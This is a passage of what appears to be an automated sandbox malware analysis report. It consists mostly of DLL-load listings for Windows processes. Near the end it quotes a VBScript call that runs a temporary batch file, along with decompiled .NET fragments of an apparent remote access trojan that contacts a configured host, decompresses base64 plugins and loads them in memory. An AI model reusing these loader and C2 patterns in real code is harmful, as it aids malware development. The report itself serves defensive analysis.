                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\shutdown.exeSection loaded: shutdownext.dllJump to behavior
                Source: C:\Windows\System32\shutdown.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.logon.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: wincorlib.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: dcomp.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xamlhost.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: mrmcorer.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: windowmanagementapi.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: textinputframework.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: inputhost.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: languageoverlayutil.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: bcp47mrm.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xaml.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.immersive.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: dwrite.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.globalization.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: d3d11.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: d3d10warp.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: directmanipulation.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: dxcore.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: d2d1.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: textshaping.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xaml.controls.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: uiautomationcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\System32\LogonUI.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dwmredir.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: udwm.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dxgi.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dwmcore.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dwmcore.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dcomp.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dxgi.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: d2d1.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dcomp.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: d3d11.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: d3dcompiler_47.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dwmghost.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dwmapi.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: avrt.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: ism.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: hid.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: ninput.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: windowmanagementapi.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: windowscodecs.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: gameinput.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: windows.gaming.input.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: uianimation.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dispbroker.desktop.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: mscms.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: coloradapterclient.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: actxprxy.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: dispbroker.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: windows.graphics.dll
                Source: C:\Windows\System32\dwm.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                Data Obfuscation

                barindex
                VBScript performs obfuscated calls to suspicious functions
                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat", "1", "true");
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                .NET source code contains potential unpacker
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Messages.cs.Net Code: Memory
